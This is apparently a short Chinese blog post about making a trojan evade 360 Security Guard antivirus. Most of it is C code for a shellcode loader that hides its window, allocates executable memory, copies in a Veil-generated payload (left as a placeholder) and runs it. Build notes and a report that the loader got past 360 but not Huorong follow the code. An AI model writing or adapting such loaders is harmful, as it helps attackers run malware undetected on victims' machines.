绕过360安全卫士(无法绕过火绒)
Buchiyexiao
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口
unsigned char shellcode[] = "veil_shellcode";
void main()
{
LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode),MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (Memory == NULL) { return; }
memcpy(Memory, shellcode, sizeof(shellcode));
((void(*)())Memory)();
}
使用VS2019提前将运行库设置成:多线程(/MT),不然VirtualAlloc函数无法正常使用,将编译生成的exe和直接生成的Windows exe木马同时扔到虚拟机中发现,Windows exe被查杀,而免杀处理后的exe绕过360安全卫士(火绒则都会直接查杀删除)